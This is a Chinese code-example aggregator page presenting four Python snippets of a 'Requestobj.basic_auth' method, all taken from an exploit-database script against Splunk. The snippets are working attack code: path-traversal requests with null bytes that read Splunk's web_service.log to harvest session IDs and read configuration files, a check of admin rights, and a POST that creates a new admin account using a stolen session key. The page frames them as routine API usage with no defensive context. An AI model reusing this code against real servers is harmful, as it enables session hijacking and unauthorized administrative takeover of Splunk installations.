当前位置: 首页>>代码示例>>Python>>正文

Python Requestobj.basic_auth方法代码示例

本文整理汇总了Python中sec1httplib.requestbuilder.Requestobj.basic_auth方法的典型用法代码示例。如果您正苦于以下问题:Python Requestobj.basic_auth方法的具体用法?Python Requestobj.basic_auth怎么用?Python Requestobj.basic_auth使用的例子?那么恭喜您, 这里精选的方法代码示例或许可以为您提供帮助。您也可以进一步了解该方法所在sec1httplib.requestbuilder.Requestobj的用法示例。


在下文中一共展示了Requestobj.basic_auth方法的4个代码示例,这些例子默认根据受欢迎程度排序。您可以为喜欢或者感觉有用的代码点赞,您的评价将有助于系统推荐出更棒的Python代码示例。

示例1: user_is_admin

# 需要导入模块: from sec1httplib.requestbuilder import Requestobj [as 别名]
# 或者: from sec1httplib.requestbuilder.Requestobj import basic_auth [as 别名]
    def user_is_admin(self,username,password):
        if self.splunkd == 1:
            # attempt to auth via splunkd to get a sessionkey
            self.username = username
            self.password = password
            self.splunkd_auth()
            url = Requestobj("{0}/services/authentication/httpauth-tokens".format(self.splunkd_url))
            url.basic_auth(username,password)

            context = url.makerequest()
            
            if '<title>httpauth-tokens' in context.body:
                self.got_admin =1
                return True
            else:
                return False
        elif self.splunkweb == 1:
            with misc_lock:
                self.username = username
                self.password = password
                if self.splunkweb_auth():
                    admin_only = Requestobj("{0}/en-US/manager/launcher/server/settings/settings?action=edit".format(self.splunkweb_url)).makerequest()
                    if admin_only.find_data("Port that Splunk Web uses"):
                        print "[i] User:{0} IS AN ADMIN.".format(username)
                        return True
                    else:
                        print "[i] User:{0} is not an admin".format(username)
                else:
                    pass
                
        else:
            print "Not Connected"
            return False
开发者ID:0x24bin,项目名称:exploit-database,代码行数:35,代码来源:18245.py

示例2: dump_session_ids

# 需要导入模块: from sec1httplib.requestbuilder import Requestobj [as 别名]
# 或者: from sec1httplib.requestbuilder.Requestobj import basic_auth [as 别名]
    def dump_session_ids(self):
        "Exploits dir traversal issue to dump session ids"
        print "[i] Attemping to dump sessions"
        if self.splunkd == 1 and self.username and self.password:
            #url = Requestobj("{0}/servicesNS/-/system/properties/..%2f..%2f..%2f..%2f..%2fopt%2fsplunk%2fvar%2flog%2fsplunk%2fweb_service.log%00/default".format(self.splunkd_url))
            url = Requestobj("{0}/servicesNS/-/system/properties/..%2f..%2f..%2fvar%2flog%2fsplunk%2fweb_service.log%00/default".format(self.splunkd_url))

            url.basic_auth(self.username,self.password)
            result = url.makerequest()
            sessions=[]
            if "session=" in result.body:
                print "[i] Session ID's extracted from web_service.log"
                sessions = re.findall("session=(.+?)[<\s]",result.body)
            for session in set(sessions):
                print "[SESSION]",session
            return set(sessions)
开发者ID:0x24bin,项目名称:exploit-database,代码行数:18,代码来源:18245.py

示例3: add_admin

# 需要导入模块: from sec1httplib.requestbuilder import Requestobj [as 别名]
# 或者: from sec1httplib.requestbuilder.Requestobj import basic_auth [as 别名]
    def add_admin(self,username,password,sessionKey):
        # look for 201
        if self.splunkd == 1 and self.username and self.password:
            url = Requestobj("{0}/servicesNS/-/launcher/authentication/users".format(self.splunkd_url))
            url.basic_auth(self.username,self.password)
            url.rawpostdata("POST","roles=user&roles=admin&name={0}&defaultApp=search&password={1}&email=&createrole=0&realname=".format(username,password))
            url.add_header("authorization","Splunk {0}".format(sessionKey))
            result = url.makerequest()
            if str(result.code) == "201":
                return True
            else:
                return False

        else:
            print "[!] Not connected to splunkd. Check port and creds"
            return False
开发者ID:0x24bin,项目名称:exploit-database,代码行数:18,代码来源:18245.py

示例4: get_splunk_home

# 需要导入模块: from sec1httplib.requestbuilder import Requestobj [as 别名]
# 或者: from sec1httplib.requestbuilder.Requestobj import basic_auth [as 别名]
    def get_splunk_home(self):
        if not self.username or not self.password:
            print "[i] Valid username and password required"
            sys.exit()
        try:
            r = Requestobj("{0}/services/properties/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fopt%2fsplunk%2fetc%2fsplunk-launch/default/SPLUNK_HOME".format(self.splunkd_url))
            r.basic_auth(self.username,self.password)
            splunkdir =  r.makerequest()

            if "ERROR" not in splunkdir.body and "Remote login disabled" not in splunkdir.body and self.splunkd:
                self.splunk_home = splunkdir.body.strip()
            else:
                print "[***] Could not get home dir setting default.."
                if "windows" in self.os_name.lower():
                    self.splunk_home = "c:\\program files\\splunk"
                else:
                    self.splunk_home = "/opt/splunk"

                print "Setting Splunk home dir to:{0}".format(self.splunk_home)

            return self.splunk_home

        except Exception as err:
            print "[i] Error occured while attempting to read splunk home dir",err
开发者ID:0x24bin,项目名称:exploit-database,代码行数:26,代码来源:18245.py


注:本文中的sec1httplib.requestbuilder.Requestobj.basic_auth方法示例由纯净天空整理自Github/MSDocs等开源代码及文档管理平台,相关代码片段筛选自各路编程大神贡献的开源项目,源码版权归原作者所有,传播和使用请参考对应项目的License;未经允许,请勿转载。